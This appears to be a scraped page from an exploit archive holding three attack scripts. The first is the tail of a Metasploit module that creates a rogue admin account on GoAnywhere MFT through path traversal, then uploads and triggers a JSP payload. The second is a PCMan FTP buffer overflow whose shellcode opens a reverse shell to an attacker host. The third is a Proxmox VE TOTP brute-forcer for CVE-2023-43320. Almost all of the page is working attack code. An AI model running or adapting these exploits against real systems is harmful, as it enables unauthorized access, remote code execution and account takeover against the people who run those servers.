"/#{path_segment}/..;/wizard/InitialAccountSetup.xhtml"<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, initialaccountsetup_endpoint),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'javax.faces.ViewState' => get_viewstate(initialaccountsetup_endpoint),<br /> 'j_id_u:creteAdminGrid:username' => admin_username,<br /> 'j_id_u:creteAdminGrid:password' => admin_password,<br /> 'j_id_u:creteAdminGrid:password_hinput' => admin_password,<br /> 'j_id_u:creteAdminGrid:confirmPassword' => admin_password,<br /> 'j_id_u:creteAdminGrid:confirmPassword_hinput' => admin_password,<br /> 'j_id_u:creteAdminGrid:submitButton' => '',<br /> 'createAdminForm_SUBMIT' => 1<br /> }<br /> )<br /><br /> # The method com.linoma.ga.ui.admin.users.InitialAccountSetupForm.InitialAccountSetupForm.submit will call method<br /> # loginNewAdminUser and update our current session, so we dont need to manually login.<br /> unless res&.code == 302 && res.headers['Location'] == normalize_uri(target_uri.path, 'Dashboard.xhtml')<br /> fail_with(Failure::UnexpectedReply, "Unexpected reply 1 from #{initialaccountsetup_endpoint}")<br /> end<br /><br /> print_status("Created account: #{admin_username}:#{admin_password}. Note: This account will not be deleted by the module.")<br /><br /> store_credentials(admin_username, admin_password)<br /><br /> # Automatic targeting will detect the OS and product installation directory, by querying the About.xhtml page.<br /> if target.name == 'Automatic'<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, '/help/About.xhtml'),<br /> 'keep_cookies' => true<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply 2 from About.xhtml')<br /> end<br /><br /> # The OS name could be something like "Linux" or "Windows Server 2022". Under the hood, GoAnywhere is using<br /> # the Java system property "os.name".<br /> os_match = res.body.match(%r{<span id="AboutForm:\S+:OSName">(.+)</span>})<br /> unless os_match<br /> fail_with(Failure::UnexpectedReply, 'Did not locate OSName in About.xhtml')<br /> end<br /><br /> # To perform the JSP payload upload, we need to know the product installation path.<br /> install_match = res.body.match(%r{<span id="AboutForm:\S+:goAnywhereHome">(.+)</span>})<br /> unless install_match<br /> fail_with(Failure::UnexpectedReply, 'Did not locate goAnywhereHome in About.xhtml')<br /> end<br /><br /> # Find the Metasploit target (Linux/Windows) via a substring of the OS name we get back from GoAnywhere.<br /> found_target = targets.find do |t|<br /> os_match[1].downcase.include? t.name.downcase<br /> end<br /><br /> unless found_target<br /> fail_with(Failure::NoTarget, "Unable to select an automatic target for '#{os_match[1]}'")<br /> end<br /><br /> # Dup the target we found, as we patch in the GOANYWHERE_INSTALL_PATH below.<br /> detected_target = found_target.dup<br /><br /> detected_target.opts['GOANYWHERE_INSTALL_PATH'] = install_match[1]<br /><br /> print_status("Automatic targeting, detected OS: #{detected_target.name}")<br /> print_status("Automatic targeting, detected install path: #{detected_target['GOANYWHERE_INSTALL_PATH']}")<br /> else<br /> detected_target = target<br /> end<br /><br /> # We are going to upload a JSP payload via the FileManager interface. We first have to get the FileManager, then<br /> # change to the directory we want to upload to, then upload the file.<br /><br /> path_separator = detected_target['Platform'] == 'win' ? '\\' : '/'<br /><br /> # We drop the JSP payload to a location such as: /opt/HelpSystems/GoAnywhere/adminroot/PAYLOAD_NAME.jsp<br /> adminroot_path = detected_target['GOANYWHERE_INSTALL_PATH']<br /> adminroot_path += path_separator unless adminroot_path.end_with? path_separator<br /> adminroot_path += 'adminroot'<br /> adminroot_path += path_separator<br /><br /> viewstate = get_viewstate('/tools/filemanager/FileManager.xhtml')<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'javax.faces.ViewState' => viewstate,<br /> 'j_id_4u:j_id_4v:newPath_focus' => '',<br /> 'j_id_4u:j_id_4v:newPath_input' => '/',<br /> 'j_id_4u:j_id_4v:newPath_editableInput' => adminroot_path,<br /> 'j_id_4u:j_id_4v:NewPathButton' => '',<br /> 'j_id_4u_SUBMIT' => 1<br /> }<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply 4 from FileManager.xhtml')<br /> end<br /><br /> # We require a regID value form the page to upload a file, so we pull that out here.<br /> vs_input = res.get_html_document.at('input[name="reqId"]')<br /><br /> unless vs_input&.key? 'value'<br /> fail_with(Failure::UnexpectedReply, 'Did not locate reqId in reply 4 from FileManager.xhtml')<br /> end<br /><br /> request_id = vs_input['value']<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'javax.faces.ViewState' => viewstate,<br /> 'javax.faces.partial.ajax' => 'true',<br /> 'javax.faces.source' => 'uploadID',<br /> 'javax.faces.partial.execute' => 'uploadID',<br /> 'javax.faces.partial.render' => '@none',<br /> 'uploadID' => 'uploadID',<br /> 'uploadID_sessionCheck' => 'true',<br /> 'reqId' => request_id,<br /> 'whenFileExists_focus' => '',<br /> 'whenFileExists_input' => 'rename',<br /> 'uploaderType' => 'filemanager',<br /> 'j_id_4i_SUBMIT' => 1<br /> }<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply 5 from FileManager.xhtml')<br /> end<br /><br /> jsp_filename = Rex::Text.rand_text_alphanumeric(8) + '.jsp'<br /><br /> message = Rex::MIME::Message.new<br /><br /> message.add_part(request_id, nil, nil, 'form-data; name="reqId"')<br /> message.add_part('', nil, nil, 'form-data; name="whenFileExists_focus"')<br /> message.add_part('rename', nil, nil, 'form-data; name="whenFileExists_input"')<br /> message.add_part('filemanager', nil, nil, 'form-data; name="uploaderType"')<br /> message.add_part('1', nil, nil, 'form-data; name="j_id_4i_SUBMIT"')<br /> message.add_part(viewstate, nil, nil, 'form-data; name="javax.faces.ViewState"')<br /> message.add_part('true', nil, nil, 'form-data; name="javax.faces.partial.ajax"')<br /> message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.partial.execute"')<br /> message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.source"')<br /> message.add_part('1', nil, nil, 'form-data; name="uniqueFileUploadId"')<br /> message.add_part(payload.encoded, 'text/plain', nil, "form-data; name=\"uploadID\"; filename=\"#{jsp_filename}\"")<br /><br /> # We can now upload our payload...<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),<br /> 'keep_cookies' => true,<br /> 'ctype' => 'multipart/form-data; boundary=' + message.bound,<br /> 'data' => message.to_s<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply 6 from FileManager.xhtml')<br /> end<br /><br /> # Register our payload so it is deleted when the session is created.<br /><br /> jsp_filepath = adminroot_path + jsp_filename<br /><br /> print_status("Dropped payload: #{jsp_filepath}")<br /><br /> # We are using the FileDropper mixin to automatically delete this file after a session has been created.<br /> register_file_for_cleanup(jsp_filepath)<br /><br /> # A copy of the files this user uploads is left here:<br /> # /opt/HelpSystems/GoAnywhere/userdata/documents/ADMIN_USERNAME/PAYLOAD_NAME.jsp<br /> # We register these to be deleted, but they appear to be locked, preventing deleting.<br /> userdoc_path = detected_target['GOANYWHERE_INSTALL_PATH']<br /> userdoc_path += path_separator unless userdoc_path.end_with? path_separator<br /> userdoc_path += 'userdata'<br /> userdoc_path += path_separator<br /> userdoc_path += 'documents'<br /> userdoc_path += path_separator<br /> userdoc_path += admin_username<br /> userdoc_path += path_separator<br /><br /> register_file_for_cleanup(userdoc_path + jsp_filename)<br /><br /> register_dir_for_cleanup(userdoc_path)<br /><br /> # Finally, trigger our payload via a GET request...<br /> send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, jsp_filename)<br /> )<br /><br /> # NOTE: it is not possible to delete the user account we created as we cant delete ourself either via the web<br /> # interface or REST API.<br /> end<br /><br /> # Helper method to pull out a viewstate identifier from a requests HTML response.<br /> def get_viewstate(endpoint)<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, endpoint),<br /> 'keep_cookies' => true<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, "Unexpected reply during get_viewstate via '#{endpoint}'.")<br /> end<br /><br /> vs_input = res.get_html_document.at('input[name="javax.faces.ViewState"]')<br /><br /> unless vs_input&.key? 'value'<br /> fail_with(Failure::UnexpectedReply, "Did not locate ViewState during get_viewstate via '#{endpoint}'.")<br /> end<br /><br /> vs_input['value']<br /> end<br /><br /> def store_credentials(username, password)<br /> service_data = {<br /> address: datastore['RHOST'],<br /> port: datastore['RPORT'],<br /> service_name: 'GoAnywhere MFT Admin Interface',<br /> protocol: 'tcp',<br /> workspace_id: myworkspace_id<br /> }<br /><br /> credential_data = {<br /> origin_type: :service,<br /> module_fullname: fullname,<br /> username: username,<br /> private_data: password,<br /> private_type: :password<br /> }.merge(service_data)<br /><br /> credential_core = create_credential(credential_data)<br /><br /> login_data = {<br /> core: credential_core,<br /> last_attempted_at: DateTime.now,<br /> status: Metasploit::Model::Login::Status::SUCCESSFUL<br /> }.merge(service_data)<br /><br /> create_credential_login(login_data)<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow<br /># Date: 09/25/2023<br /># Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)<br /># Vendor Homepage: http://pcman.openfoundry.org/<br /># Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z<br /># Version: 2.0<br /># Tested on: Windows XP SP3<br /><br />#!/usr/bin/python<br /><br />import socket<br /><br />#buffer = 'A' * 2500<br />#offset = 2007<br />#badchars=\x00\x0a\x0d<br />#return_address=0x7e429353 (USER32.dll)<br />#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d"<br />#nc -nvlp 4444<br /><br />overflow = (<br />"\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9"<br />"\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d"<br />"\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f"<br />"\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53"<br />"\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55"<br />"\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1"<br />"\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52"<br />"\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6"<br />"\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37"<br />"\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf"<br />"\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3"<br />"\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4"<br />"\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75"<br />"\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7"<br />"\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e"<br />"\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17"<br />"\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98" <br />"\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a" <br />"\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15" <br />"\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28" <br />"\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb" <br />"\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8" <br />"\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8" <br />"\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd"<br />"\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94"<br />"\xd7")<br /><br />shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow<br /><br /># Change IP/Port as required <br /><br />s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /><br />try:<br /> print "\nSending evil buffer..."<br /> s.connect(('192.168.146.135',21))<br /> data = s.recv(1024)<br /> s.send('USER anonymous' +'\r\n')<br /> data = s.recv(1024)<br /> s.send('PASS anonymous\r\n')<br /> s.send('pwd ' + shellcode + '\r\n')<br /> s.close()<br /> print "\nExploit completed successfully!."<br />except:<br /> print "Could not connect to FTP!"<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Proxmox VE TOTP Brute Force<br /># Date: 09/23/2023<br /># Exploit Author: Cory Cline, Gabe Rust<br /># Vendor Homepage: https://www.proxmox.com/en/<br /># Software Link: http://download.proxmox.com/iso/<br /># Version: 5.4 - 7.4-1<br /># Tested on: Debian<br /># CVE : CVE-2023-43320<br /><br />import time<br />import requests<br />import urllib.parse<br />import json<br />import os<br />import urllib3<br /><br />urllib3.disable_warnings()<br />threads=25<br /><br />#################### REPLACE THESE VALUES #########################<br />password="KNOWN PASSWORD HERE"<br />username="KNOWN USERNAME HERE"<br />target_url="https://HOST:PORT"<br />##################################################################<br /><br />ticket=""<br />ticket_username=""<br />CSRFPreventionToken=""<br />ticket_data={}<br /><br />auto_refresh_time = 20 # in minutes - 30 minutes before expiration<br />last_refresh_time = 0<br /><br />tokens = [];<br /><br />for num in range(0,1000000):<br /> tokens.append(str(num).zfill(6))<br /><br />def refresh_ticket(target_url, username, password):<br /> global CSRFPreventionToken<br /> global ticket_username<br /> global ticket_data<br /> refresh_ticket_url = target_url + "/api2/extjs/access/ticket"<br /> refresh_ticket_cookies = {}<br /> refresh_ticket_headers = {}<br /> refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"}<br /> ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text)<br /> ticket_data = json.loads(ticket_data_raw)<br /> CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"]<br /> ticket_username = ticket_data["data"]["username"]<br /><br />def attack(token):<br /> global last_refresh_time<br /> global auto_refresh_time<br /> global target_url<br /> global username<br /> global password<br /> global ticket_username<br /> global ticket_data<br /> if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ):<br /> refresh_ticket(target_url, username, password)<br /> last_refresh_time = int(time.time())<br /><br /> url = target_url + "/api2/extjs/access/ticket"<br /> cookies = {}<br /> headers = {"Csrfpreventiontoken": CSRFPreventionToken}<br /> stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1]<br /> stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A')<br /> data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)}<br /> response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False)<br /> if(len(response.text) > 350):<br /> print(response.text)<br /> os._exit(1)<br /><br />while(1):<br /> refresh_ticket(target_url, username, password)<br /> last_refresh_time = int(time.time())<br /><br /> with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:<br /> res = [executor.submit(attack, token) for token in tokens]<br /> concurrent.futures.wait(res)<br /> <br /><br /></code></pre>